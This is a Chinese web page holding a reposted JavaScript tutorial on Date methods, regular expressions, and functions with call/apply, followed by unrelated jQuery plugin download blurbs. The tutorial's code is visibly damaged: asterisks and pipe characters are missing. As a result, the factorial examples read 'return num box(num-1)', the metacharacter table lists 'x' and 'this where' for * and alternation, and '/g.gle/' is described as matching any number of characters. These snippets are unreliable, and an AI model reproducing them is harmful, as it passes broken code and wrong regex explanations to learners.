设置秒数alert(box.getMilliseconds()); // 返回毫秒数alert(box.setMilliseconds()); // 设置毫秒数alert(box.getTimezoneOffset()); // 返回本地时间和 UTC 时间相差的分钟数 以上方法除了 getTimezoneOffset()，其他都具有 UTC 功能，例如 setDate()及 getDate()获取星期几，那么就会有 setUTCDate()及getUTCDate()，表示世界协调时间。 2、正则表达式 假设用户需要在 HTML 表单中填写姓名、地址、出生日期等。那么在将表单提交到服务器进一步处理前，JavaScript 程序会检查表单以确认用户确实输入了信息并且这些信息是符合要求的。 什么是正则表达式 正则表达式（regular expression）是一个描述字符模式的对象。ECMAScript 的 RegExp 类表示正则表达式，而 String 和 RegExp 都定义了使用正则表达式进行强大的模式匹配和文本检索与替换的函数。 正则表达式主要用来验证客户端的输入数据。用户填写完表单单击按钮之后，表单就会被发送到服务器，在服务器端通常会用 PHP、ASP.NET 等服务器脚本对其进行进一步处理 。因为客户端验证，可以节约大量的服务器端的系统资源，并且提供更好的用户体验。 创建正则表达式 创建正则表达式和创建字符串类似，创建正则表达式提供了两种方法，一种是采用 new 运算符，另一个是采用字面量方式。 两种创建方式 var box = new RegExp('box'); // 第一个参数字符串var box = new RegExp('box', 'ig'); // 第二个参数可选模式修饰符 模式修饰符的可选参数 参数 含义 i 忽略大小写 g 全局匹配 m 多行匹配 var box = /box/; // 直接用两个反斜杠var box = /box/ig; // 在第二个斜杠后面加上模式修饰符 测试正则表达式 RegExp 对象包含两个方法：test()和 exec()，功能基本相似，用于测试字符串匹配。test()方法在字符串中查找是否存在指定的正则表达式并返回布尔值，如果存在则返回 true，不存在则返回 false。exec()方法也用于在字符串中查找指定正则表达式，如果 exec()方法执行成功，则返回包含该查找字符串的相关信息数组。如果执行失败，则返回 null。 RegExp 对象的方法 方法 功能 test 在字符串中测试模式匹配，返回 true 或 false exec 在字符串中执行匹配搜索，返回结果数组 // 使用 new 运算符的 test 方法示例var pattern = new RegExp('box', 'i'); // 创建正则模式，不区分大小写var str = 'This is a Box!'; // 创建要比对的字符串alert(pattern.test(str)); // 通过 test()方法验证是否匹配// 使用字面量方式的 test 方法示例var pattern = /box/i; // 创建正则模式，不区分大小写var str = 'This is a Box!';alert(pattern.test(str));// 使用一条语句实现正则匹配alert(/box/i.test('This is a Box!')); // 模式和字符串替换掉了两个变量// 使用 exec 返回匹配数组var pattern = /box/i;var str = 'This is a Box!';alert(pattern.exec(str)); // 匹配了返回数组，否则返回 null 使用字符串的正则表达式方法 除了 test()和 exec()方法，String 对象也提供了 4 个使用正则表达式的方法。 String 对象中的正则表达式方法 方法 含义 match(pattern) 返回 pattern 中的子串或 null replace(pattern, replacement) 用 replacement 替换 pattern search(pattern) 返回字符串中 pattern 开始位置 split(pattern) 返回字符串按指定 pattern 拆分的数组 // 使用 match 方法获取获取匹配数组var pattern = /box/ig; // 全局搜索var str = 'This is a Box!，That is a Box too';alert(str.match(pattern)); // 匹配到两个 Box,Boxalert(str.match(pattern).length); // 获取数组的长度// 使用 search 来查找匹配数据var pattern = /box/ig;var str = 'This is a Box!，That is a Box too';alert(str.search(pattern)); // 查找到返回位置，否则返回-1 因为 search 方法查找到即返回，也就是说无需 g 全局。 // 使用 replace 替换匹配到的数据var pattern = /box/ig;var str = 'This is a Box!，That is a Box too';alert(str.replace(pattern, 'Tom')); // 将 Box 替换成了 Tom// 使用 split 拆分成字符串数组var pattern = / /ig;var str = 'This is a Box!，That is a Box too';alert(str.split(pattern)); // 将空格拆开分组成数组 RegExp 对象的静态属性 属性 短名 含义 input $_ 当前被匹配的字符串 lastMatch $& 最后一个匹配字符串 lastParen $+ 最后一对圆括号内的匹配子串 leftContext $ 最后一次匹配前的子串 multiline $ 用于指定是否所有的表达式都用于多行的布尔值 rightContext $’ 在上次匹配之后的子串 // 使用静态属性var pattern = /(g)oogle/;var str = 'This is google！';pattern.test(str); // 执行一下alert(RegExp.input); // This is google！alert(RegExp.leftContext); // This isalert(RegExp.rightContext); // ！alert(RegExp.lastMatch); // googlealert(RegExp.lastParen); // galert(RegExp.multiline); // false Opera 不支持 input、lastMatch、lastParen 和 multiline 属性。IE 不支持 multiline 属性。所有的属性可以使用短名来操作。RegExp.input 可以改写成 RegExp['$_']，依次类推。但 RegExp.input 比较特殊，它还可以写成 RegExp.$_。 RegExp 对象的实例属性 属性 含义 global Boolean 值，表示 g 是否已设置 ignoreCase Boolean 值，表示 i 是否已设置 lastIndex 整数，代表下次匹配将从哪里字符位置开始 multiline Boolean 值，表示 m 是否已设置 Source 正则表达式的源字符串形式 // 使用实例属性var pattern = /google/ig;alert(pattern.global); // true，是否全局了alert(pattern.ignoreCase); // true，是否忽略大小写alert(pattern.multiline); // false，是否支持换行alert(pattern.lastIndex); // 0，下次的匹配位置alert(pattern.source); // google，正则表达式的源字符串var pattern = /google/g;var str = 'google google google';pattern.test(str); // google，匹配第一次alert(pattern.lastIndex); // 6，第二次匹配的位 以上基本没什么用。并且 lastIndex 在获取下次匹配位置上 IE 和其他浏览器有偏差 ，主要表现在非全局匹配上。lastIndex 还支持手动设置，直接赋值操作。 获取控制 正则表达式元字符是包含特殊含义的字符。它们有一些特殊功能，可以控制匹配模式的方式。反斜杠后的元字符将失去其特殊含义。 字符类：单个字符和数字 元字符/元符号 匹配情况 . 匹配除换行符外的任意字符 [a-z0-9] 匹配括号中的字符集中的任意字符 [^a-z0-9] 匹配任意不在括号中的字符集中的字符 \d 匹配数字 \D 匹配非数字，同[^0-9]相同 \w 匹配字母和数字及_ \W 匹配非字母和数字及_ 字符类：空白字符 元字符/元符号 匹配情况 \0 匹配 null 字符 \b 匹配空格字符 \f 匹配进纸字符 \n 匹配换行符 \r 匹配回车字符 \t 匹配制表符 \s 匹配空白字符、空格、制表符和换行符 \S 匹配非空白字符 字符类：锚字符 元字符/元符号 匹配情况 ^ 行首匹配 $ 行尾匹配 \A 只有匹配字符串开始处 \b 匹配单词边界，词在[]内时无效 \B 匹配非单词边界 \G 匹配当前搜索的开始位置 \Z 匹配字符串结束处或行尾 \z 只匹配字符串结束处 字符类：重复字符 元字符/元符号 匹配情况 x? 匹配 0 个或 1 个 x x 匹配 0 个或任意多个 x x+ 匹配至少一个 x (xyz)+ 匹配至少一个(xyz) x{m,n} 匹配最少 m 个、最多 n 个 x 字符类：替代字符 元字符/元符号 匹配情况 this where 字符类：记录字符 元字符/元符号 匹配情况 (string) 用于反向引用的分组 \1 或$1 匹配第一个分组中的内容 \2 或$2 匹配第二个分组中的内容 \3 或$3 匹配第三个分组中的内容 // 使用点元字符var pattern = /g..gle/; // .匹配一个任意字符var str = 'google';alert(pattern.test(str));// 重复匹配var pattern = /g.gle/; // .匹配 0 个一个或多个var str = 'google'; //,?,+,{n,m}alert(pattern.test(str));// 使用字符类匹配var pattern = /g[a-zA-Z_]gle/; // [a-z]表示任意个 a-z 中的字符var str = 'google';alert(pattern.test(str));var pattern = /g[^0-9]gle/; // [^0-9]表示任意个非 0-9 的字符var str = 'google';alert(pattern.test(str));var pattern = /[a-z][A-Z]+/; // [A-Z]+表示 A-Z 一次或多次var str = 'gOOGLE';alert(pattern.test(str));// 使用元符号匹配var pattern = /g\wgle/; // \w匹配任意多个所有字母数字_var str = 'google';alert(pattern.test(str));var pattern = /google\d/; // \d匹配任意多个数字var str = 'google444';alert(pattern.test(str));var pattern = /\D{7,}/; // \D{7,}匹配至少 7 个非数字var str = 'google8';alert(pattern.test(str));// 使用锚元字符匹配var pattern = /^google$/; // ^从开头匹配，$从结尾开始匹配var str = 'google';alert(pattern.test(str));var pattern = /goo\sgle/; // \s 可以匹配到空格var str = 'goo gle';alert(pattern.test(str));var pattern = /google\b/; // \b 可以匹配是否到了边界var str = 'google';alert(pattern.test(str));// 使用或模式匹配var pattern = /google|baidu|bing/; // 匹配三种其中一种字符串var str = 'google';alert(pattern.test(str));// 使用分组模式匹配var pattern = /(google){4,8}/; // 匹配分组里的字符串 4-8 次var str = 'googlegoogle';alert(pattern.test(str));var pattern = /8(.)8/; // 获取 8..8 之间的任意字符var str = 'This is 8google8';str.match(pattern);alert(RegExp.$1); // 得到第一个分组里的字符串内容var pattern = /8(.)8/;var str = 'This is 8google8';var result = str.replace(pattern,'<strong>$1</strong>'); // 得到替换的字符串输出document.write(result);var pattern = /(.)\s(.)/;var str = 'google baidu';var result = str.replace(pattern, '$2 $1'); // 将两个分组的值替换输出document.write(result); 贪婪 惰性 + +? ? ?? ? {n} {n}? {n,} {n,}? {n,m} {n,m}? // 关于贪婪和惰性var pattern = /[a-z]+?/; // ?号关闭了贪婪匹配，只替换了第一个var str = 'abcdefjhijklmnopqrstuvwxyz';var result = str.replace(pattern, 'xxx');alert(result);var pattern = /8(.+?)8/g; // 禁止了贪婪，开启的全局var str = 'This is 8google8, That is 8google8, There is 8google8';var result = str.replace(pattern,'<strong>$1</strong>');document.write(result);var pattern = /8([^8])8/g; // 另一种禁止贪婪var str = 'This is 8google8, That is 8google8, There is 8google8';var result = str.replace(pattern,'<strong>$1</strong>');document.write(result);// 使用 exec 返回数组var pattern = /^[a-z]+\s[0-9]{4}$/i;var str = 'google 2012';alert(pattern.exec(str)); // 返回整个字符串var pattern = /^[a-z]+/i; // 只匹配字母var str = 'google 2012';alert(pattern.exec(str)); // 返回 googlevar pattern = /^([a-z]+)\s([0-9]{4})$/i; // 使用分组var str = 'google 2012';alert(pattern.exec(str)[0]); // google 2012alert(pattern.exec(str)[1]); // googlealert(pattern.exec(str)[2]); // 2012// 捕获性分组和非捕获性分组var pattern = /(\d+)([a-z])/; // 捕获性分组var str = '123abc';alert(pattern.exec(str));var pattern = /(\d+)(?:[a-z])/; // 非捕获性分组var str = '123abc';alert(pattern.exec(str));// 使用分组嵌套var pattern = /(A?(B?(C?)))/; // 从外往内获取var str = 'ABC';alert(pattern.exec(str));// 使用前瞻捕获var pattern = /(goo(?=gle))/; // goo 后面必须跟着 gle 才能捕获var str = 'google';alert(pattern.exec(str));// 使用特殊字符匹配var pattern = /\.\[\/b\]/; // 特殊字符，用\符号转义即可var str = '.[/b]';alert(pattern.test(str));// 使用换行模式var pattern = /^\d+/mg; // 启用了换行模式var str = '1.baidu\n2.google\n3.bing';var result = str.replace(pattern, '');alert(result); 常用的正则 检查邮政编码 var pattern = /[1-9][0-9]{5}/; // 共 6 位数字，第一位不能为 0var str = '224000';alert(pattern.test(str)); 检查文件压缩包 var pattern = /[\w]+\.zip|rar|gz/; // \w 表示所有数字和字母加下划线var str = '123.zip'; // \.表示匹配.，后面是一个选择alert(pattern.test(str)); 删除多余空格 var pattern = /\s/g; // g 必须全局，才能全部匹配var str = '111 222 333';var result = str.replace(pattern,''); // 把空格匹配成无空格alert(result); 删除首尾空格 var pattern = /^\s+/; // 强制首var str = ' goo gle ';var result = str.replace(pattern, '');pattern = /\s+$/; // 强制尾result = result.replace(pattern, '');alert('|' + result + '|');var pattern = /^\s(.+?)\s$/; // 使用了非贪婪捕获var str = ' google ';alert('|' + pattern.exec(str)[1] + '|');var pattern = /^\s(.+?)\s$/;var str = ' google ';alert('|' + str.replace(pattern, '$1') + '|'); // 使用了分组获取 简单的电子邮件验证 var pattern = /^([a-zA-Z0-9_\.\-]+)@([a-zA-Z0-9_\.\-]+)\.([a-zA-Z]{2,4})$/;var str = 'yc60.com@gmail.com';alert(pattern.test(str));var pattern = /^([\w\.\-]+)@([\w\.\-]+)\.([\w]{2,4})$/;var str = 'yc60.com@gmail.com';alert(pattern.test(str)); 3、Function类型 在 ECMAScript 中，Function（函数）类型实际上是对象。每个函数都是 Function 类型的实例，而且都与其他引用类型一样具有属性和方法。由于函数是对象，因此函数名实际上也是一个指向函数对象的指针。 函数的声明方式 普通的函数声明 function box(num1, num2) {return num1+ num2;} 使用变量初始化函数 var box= function(num1, num2) {return num1 + num2;}; 使用 Function 构造函数 var box= new Function('num1', 'num2' ,'return num1 + num2'); 第三种方式我们不推荐，因为这种语法会导致解析两次代码（第一次解析常规 ECMAScript 代码，第二次是解析传入构造函数中的字符串），从而影响性能。但我们可以通过这种语法来理解"函数是对象，函数名是指针"的概念。 作为值的函数 ECMAScript 中的函数名本身就是变量，所以函数也可以作为值来使用。也就是说，不仅可以像传递参数一样把一个函数传递给另一个函数，而且可以将一个函数作为另一个函数的结果返回。 function box(sumFunction, num) {return sumFunction(num); // someFunction}function sum(num) {return num + 10;}var result = box(sum, 10); // 传递函数到另一个函数里 函数内部属性 在函数内部，有两个特殊的对象：arguments 和 this。arguments 是一个类数组对象，包含着传入函数中的所有参数，主要用途是保存函数参数。但这个对象还有一个名叫 callee 的属性，该属性是一个指针，指向拥有这个 arguments 对象的函数。 function box(num) {if (num <= 1) {return 1;} else {return num box(num-1); // 一个简单的的递归} } 对于阶乘函数一般要用到递归算法，所以函数内部一定会调用自身；如果函数名不改变是没有问题的，但一旦改变函数名，内部的自身调用需要逐一修改。为了解决这个问题，我们可以使用 arguments.callee 来代替。 function box(num) {if (num <= 1) {return 1;} else {return num arguments.callee(num-1); // 使用 callee 来执行自身} } 函数内部另一个特殊对象是 this，其行为与 Java 和 C中的 this 大致相似。换句话说 ，this 引用的是函数据以执行操作的对象，或者说函数调用语句所处的那个作用域。当在全局作用域中调用函数时，this 对象引用的就是 window。 // 便于理解的改写例子window.color = '红色的'; // 全局的，或者 var color = '红色的';也行alert(this.color); // 打印全局的 colorvar box = {color : '蓝色的', // 局部的 colorsayColor : function () {alert(this.color); // 此时的 this 只能 box 里的 color} };box.sayColor(); // 打印局部的 coloralert(this.color); // 还是全局的// 引用教材的原版例子window.color = '红色的'; // 或者 var color = '红色的';也行var box = {color : '蓝色的'};function sayColor() {alert(this.color); // 这里第一次在外面，第二次在 box 里面}getColor();box.sayColor = sayColor; // 把函数复制到 box 对象里，成为了方法box.sayColor(); 函数属性和方法 ECMAScript 中的函数是对象，因此函数也有属性和方法。每个函数都包含两个属性 ：length 和 prototype。其中，length 属性表示函数希望接收的命名参数的个数。 function box(name, age) {alert(name + age);}alert(box.length); // 2 对于 prototype 属性，它是保存所有实例方法的真正所在，也就是原型。这个属性 ，我们将在面向对象一章详细介绍。而 prototype 下有两个方法：apply()和 call()，每个函数都包含这两个非继承而来的方法。这两个方法的用途都在特定的作用域中调用函数，实际上等于设置函数体内 this 对象的值。 function box(num1, num2) {return num1 + num2; // 原函数}function sayBox(num1, num2) {return box.apply(this, [num1, num2]); // this 表示作用域，这里是 window} // []表示 box 所需要的参数function sayBox2(num1, num2) {return box.apply(this, arguments); // arguments 对象表示 box 所需要的参数}alert(sayBox(10,10)); // 20alert(sayBox2(10,10)); // 20 call()方法于 apply()方法相同，他们的区别仅仅在于接收参数的方式不同。对于 call()方法而言，第一个参数是作用域，没有变化，变化只是其余的参数都是直接传递给函数的。 function box(num1, num2) {return num1 + num2;}function callBox(num1, num2) {return box.call(this, num1, num2); // 和 apply 区别在于后面的传参}alert(callBox(10,10)); 事实上，传递参数并不是 apply()和 call()方法真正的用武之地；它们经常使用的地方是能够扩展函数赖以运行的作用域。 var color = '红色的'; // 或者 window.color = '红色的';也行var box = {color : '蓝色的'};function sayColor() {alert(this.color);}sayColor(); // 作用域在 windowsayColor.call(this); // 作用域在 windowsayColor.call(window); // 作用域在 windowsayColor.call(box); // 作用域在 box，对象冒充 这个例子是之前作用域理解的例子修改而成，我们可以发现当我们使用 call(box)方法的时候，sayColor()方法的运行环境已经变成了 box 对象里了。 使用 call()或者 apply()来扩充作用域的最大好处，就是对象不需要与方法发生任何耦合关系（耦合，就是互相关联的意思，扩展和维护会发生连锁反应）。也就是说，box 对象和 sayColor()方法之间不会有多余的关联操作，比如 box.sayColor = sayColor;。 本篇文章为转载内容。原文链接：https://blog.csdn.net/gongxifacai_believe/article/details/108286196。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...需通过npm进行便捷安装（npminstallswingdrag），并在项目中引入必要的脚本文件，包括jQuery、jQueryUI的核心库以及jQuery.ui.swingdrag.min.js。一旦集成到网页中，任何支持jQueryUI拖拽功能的元素都能自动获得额外的摇摆特效，无需从零开始编写复杂的CSS3动画代码。这款插件将功能性与艺术性完美结合，是构建现代Web应用时提升用户体验的理想工具。 点我下载 文件大小：179.21 KB 您将下载一个JQuery插件资源包，该资源包内部文件的目录结构如下： 本网站提供JQuery插件下载功能，旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容，请立即告知我们，我们将迅速响应并删除相关内容。 免责声明：站内所有资源仅供个人学习研究及参考之用，严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果，由使用者承担责任。

...的表情符号选择功能。使用者只需点击输入框旁边自动生成的表情面板，即可从海量表情库中可视化选取并插入表情符号到当前光标位置，大大丰富了文本交流的表现力。EmojiPicker插件不仅易于安装和定制，还兼容多种浏览器环境，确保跨平台的一致性和用户体验。总的来说，这款插件作为一款高效实用的工具，有效地简化了在网页端实现复杂表情输入机制的过程，让网站和应用能够紧跟社交潮流，提升用户的互动参与度和情感表达能力。 点我下载 文件大小：3.22 MB 您将下载一个JQuery插件资源包，该资源包内部文件的目录结构如下： 本网站提供JQuery插件下载功能，旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容，请立即告知我们，我们将迅速响应并删除相关内容。 免责声明：站内所有资源仅供个人学习研究及参考之用，严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果，由使用者承担责任。

...的浏览器插件，名为“Windows桌面布局模板”，是一款独具匠心的网页布局工具，专门设计用于模拟真实的Windows操作系统桌面环境。该插件通过整合Bootstrap强大的响应式网格系统与jQueryUI的高度交互性，成功实现了在网页上构建类似Windows系统的用户界面体验。此模板不仅外观效果炫酷且操作直观，它精心复刻了Windows的经典元素，如功能齐全的开始菜单以及实时更新的时间显示模块，为用户提供了一种熟悉的导航和时间管理方式。尤为值得一提的是，该插件还包含了用户登录界面布局的功能模块，方便开发者快速实现网站或应用的用户身份验证环节。作为一款便捷高效的网页模板，开发者能够轻松集成并自定义此插件以适应各种项目需求，极大地简化了创建高度拟物化、具备丰富交互体验的网页布局过程。无论是进行Web应用程序原型设计，还是提升网站的用户体验，这个基于Bootstrap和jQuery的Windows桌面布局模板都将成为一个极具价值的工具选择。 点我下载 文件大小：816.76 KB 您将下载一个JQuery插件资源包，该资源包内部文件的目录结构如下： 本网站提供JQuery插件下载功能，旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容，请立即告知我们，我们将迅速响应并删除相关内容。 免责声明：站内所有资源仅供个人学习研究及参考之用，严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果，由使用者承担责任。

...官方网站的导航风格。使用此插件，您可以轻松地在网站上实现多级下拉菜单效果，使用户能够更方便快捷地浏览网站内容。无论是产品展示还是服务介绍，该下拉菜单都能确保您的网站界面既美观又实用。安装并配置此插件后，您将看到一个响应式的设计，它能在各种设备上展现出色的表现，包括桌面电脑、平板电脑和手机。其流畅的过渡动画和直观的用户交互，不仅提升了网站的专业形象，还增强了用户的访问体验。此外，插件支持自定义样式，允许开发者根据自己的需求调整颜色、字体等元素，以匹配网站的整体视觉风格。无论您是在构建企业官网还是个人博客，这款下拉菜单插件都是提升网站导航功能的理想选择。它的易用性和灵活性使其成为众多开发者和设计师的首选工具，帮助他们快速创建出既美观又高效的网站导航系统。 点我下载 文件大小：45.11 KB 您将下载一个JQuery插件资源包，该资源包内部文件的目录结构如下： 本网站提供JQuery插件下载功能，旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容，请立即告知我们，我们将迅速响应并删除相关内容。 免责声明：站内所有资源仅供个人学习研究及参考之用，严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果，由使用者承担责任。

...er或npm等包管理工具可轻松安装，并且兼容广泛，能够在现代浏览器中稳定运行，极大地简化了开发者在网站中实现滚动触发动画的设计流程，提升了网页动态效果制作的工作效率与创作自由度。 点我下载 文件大小：94.08 KB 您将下载一个JQuery插件资源包，该资源包内部文件的目录结构如下： 本网站提供JQuery插件下载功能，旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容，请立即告知我们，我们将迅速响应并删除相关内容。 免责声明：站内所有资源仅供个人学习研究及参考之用，严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果，由使用者承担责任。

...和用户体验设计的实用工具。这款插件能够智能地将Bootstrap框架下的tabs选项卡转换为下拉菜单，以适应不同屏幕尺寸和布局需求。当你的页面在较小的屏幕上展示时，如果tabs选项卡无法在一屏内完整显示，此插件会自动将多余选项卡内容折叠至下拉菜单中，确保用户界面整洁且易于导航。通过使用bootstrap-tabdrop.js，开发者可以轻松实现响应式设计，无需繁琐的手动调整。它不仅简化了前端开发流程，还增强了网站或应用的美观度与功能性，特别是在移动设备上提供了更加流畅的用户体验。无论是个人项目还是企业级应用，这款插件都是提升网页交互性和可访问性的理想选择。安装和配置简便，只需引入相应的JavaScript和CSS文件，并根据需要进行少量的HTML结构调整即可。此外，插件兼容最新版本的Bootstrap框架，确保其功能强大且稳定可靠。对于追求高品质用户体验的开发者而言，bootstrap-tabdrop.js无疑是一个值得信赖的选择。 点我下载 文件大小：88.72 KB 您将下载一个JQuery插件资源包，该资源包内部文件的目录结构如下： 本网站提供JQuery插件下载功能，旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容，请立即告知我们，我们将迅速响应并删除相关内容。 免责声明：站内所有资源仅供个人学习研究及参考之用，严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果，由使用者承担责任。

...于jQuery的强大工具，它能够轻松地在网页中添加令人惊艳的文字和图标动画效果。该插件包含八种独特的动画样式，每一种都能让你的菜单焕发出不同的魅力。无论是悬停时的动态文字变形，还是点击后的图标滑动过渡，这些动画都旨在提升用户体验并增强网站的吸引力。通过使用jQuery和jquery.easing库，该插件能够实现流畅自然的动画效果，让每个细节都显得生动有趣。安装此插件后，你只需简单的HTML和CSS代码即可触发这些动画效果，无需复杂的JavaScript编程知识。此外，其高度可定制的特性使得你可以根据自己的需求调整动画的速度、延迟时间以及触发条件，确保最终呈现的效果完全符合你的设计意图。不论是用于导航栏、侧边栏还是任何需要吸引用户注意的地方，“超酷文本和图标动画菜单”都是你不可多得的辅助工具，帮助你在竞争激烈的网络环境中脱颖而出。 点我下载 文件大小：76.05 KB 您将下载一个JQuery插件资源包，该资源包内部文件的目录结构如下： 本网站提供JQuery插件下载功能，旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容，请立即告知我们，我们将迅速响应并删除相关内容。 免责声明：站内所有资源仅供个人学习研究及参考之用，严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果，由使用者承担责任。

...ON数据可读性的强大工具，专为开发者设计。这款插件通过格式化JSON数据，使之更加清晰易懂，从而极大地提升了数据分析与调试的效率。它支持语法高亮功能，能针对不同数据类型（如字符串、数字、数组、对象）进行专门的色彩标记，使得数据结构一目了然，易于理解。jQueryJSONView不仅能够展示数据的完整结构，还提供了一键展开或折叠数据节点的功能，方便用户根据需要查看或隐藏详细信息。这在处理大型或嵌套结构的JSON数据时尤为有用，能够有效避免页面过于拥挤，提高阅读体验。此外，插件还具备强大的兼容性，能够在各种现代浏览器中流畅运行，无需额外安装或配置。其简洁的API接口使得集成到现有项目中变得简单快捷，无需复杂的配置步骤。总之，jQueryJSONView作为一款功能全面且易于使用的jQuery插件，对于任何需要处理、分析或展示JSON数据的场景来说都是一个不可或缺的工具。无论是前端开发、后端数据处理，还是日常的项目调试，jQueryJSONView都能提供高效、直观的解决方案，显著提升工作效率。 点我下载 文件大小：49.05 KB 您将下载一个JQuery插件资源包，该资源包内部文件的目录结构如下： 本网站提供JQuery插件下载功能，旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容，请立即告知我们，我们将迅速响应并删除相关内容。 免责声明：站内所有资源仅供个人学习研究及参考之用，严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果，由使用者承担责任。

...ery插件，旨在模仿Windows8操作系统中流畅而美观的消息提示框效果。这款插件不仅提供了丰富的内置主题样式，让用户能够轻松地选择适合其网站风格的消息提示框外观，还支持用户根据个人需求自定义主题样式，从而实现高度的个性化。使用jquery-notific8，开发者可以灵活地控制消息提示框的各种属性，比如设置自动关闭时间、添加图标以增强视觉效果，以及指定显示位置。这使得该插件在提供强大功能的同时，依然保持了极高的易用性和灵活性。无论是用于页面上的即时反馈信息，还是作为用户交互的一部分，jquery-notific8都能确保信息传达得既高效又美观。此外，这款插件轻量级的设计使其在各种设备和浏览器上都能表现出色，无需担心性能问题。对于希望提升用户体验，同时保持界面简洁现代的网页开发者来说，jquery-notific8无疑是一个值得尝试的强大工具。通过简单地引入这一插件，你就能为你的项目增添一抹现代气息，使用户在浏览网页时获得更加愉悦和直观的操作体验。 点我下载 文件大小：308.20 KB 您将下载一个JQuery插件资源包，该资源包内部文件的目录结构如下： 本网站提供JQuery插件下载功能，旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容，请立即告知我们，我们将迅速响应并删除相关内容。 免责声明：站内所有资源仅供个人学习研究及参考之用，严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果，由使用者承担责任。

...插件的核心优势在于它使用了雪碧图技术来存储产品图片的不同帧，使得在用户拖动图片或滑动滑块时，能够快速切换不同的图片帧，从而呈现出流畅自然的360度旋转效果。这种设计不仅提升了用户体验，还减少了服务器的加载压力，确保了网页的加载速度。安装和配置过程简单快捷，开发者只需几行代码即可将此特效集成到现有的网页项目中。此外，该插件完全兼容现代浏览器，并且支持响应式布局，无论是在桌面还是移动设备上都能保持一致的表现效果。不论是用于电子商务网站的商品展示，还是在线产品目录中的视觉增强，这款jQuery和CSS3360度产品预览特效插件都是提升网站吸引力和转化率的理想选择。它不仅能吸引用户的注意力，还能有效提高用户的参与度和购买意愿，是提升品牌形象和销售业绩的强大工具。 点我下载 文件大小：2.03 MB 您将下载一个JQuery插件资源包，该资源包内部文件的目录结构如下： 本网站提供JQuery插件下载功能，旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容，请立即告知我们，我们将迅速响应并删除相关内容。 免责声明：站内所有资源仅供个人学习研究及参考之用，严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果，由使用者承担责任。

...整体设计感和吸引力。安装与配置过程十分简单，只需几行代码即可集成至现有项目中。此外，该插件还具有高度的自定义性，允许用户根据自己的需求调整颜色、大小、过渡速度等参数，以达到最理想的展示效果。无论你是前端开发新手还是经验丰富的老手，这款插件都是提升网站视觉效果的理想选择。总之，“6种炫酷的鼠标滑过图片显示遮罩层特效”插件凭借其简洁高效的特性，为网页设计师和开发者提供了一个快速美化网站图片的有效工具，是任何希望优化网页视觉体验项目的理想选择。 点我下载 文件大小：460.32 KB 您将下载一个JQuery插件资源包，该资源包内部文件的目录结构如下： 本网站提供JQuery插件下载功能，旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容，请立即告知我们，我们将迅速响应并删除相关内容。 免责声明：站内所有资源仅供个人学习研究及参考之用，严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果，由使用者承担责任。

...过引入一种直观且易于使用的交互方式，增强了用户体验的同时也加强了账户安全。该插件的最大亮点在于其高度兼容性，尤其支持IE8及更高版本的浏览器，确保了广泛的适用范围和良好的兼容性，无论用户使用何种浏览器访问网站，都能获得一致且流畅的验证体验。此外，它还特别注重用户体验，滑块操作简单明了，用户只需轻轻一拖即可完成验证过程，极大地简化了登录步骤，提高了用户满意度。在安全性方面，此插件通过要求用户手动操作滑块来确认其为真实的人类用户，从而有效地抵御了自动化工具或脚本的攻击。这种机制不仅增加了登录过程的安全性，也减少了因机器人尝试登录而导致的服务器资源浪费。无论是个人网站还是大型电商平台，这款插件都是一款理想的登录验证解决方案，它不仅能够保护用户的账号安全，还能显著提升网站的整体用户体验。安装简便，配置灵活，是开发者实现高效、安全登录验证的理想选择。 点我下载 文件大小：44.66 KB 您将下载一个JQuery插件资源包，该资源包内部文件的目录结构如下： 本网站提供JQuery插件下载功能，旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容，请立即告知我们，我们将迅速响应并删除相关内容。 免责声明：站内所有资源仅供个人学习研究及参考之用，严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果，由使用者承担责任。

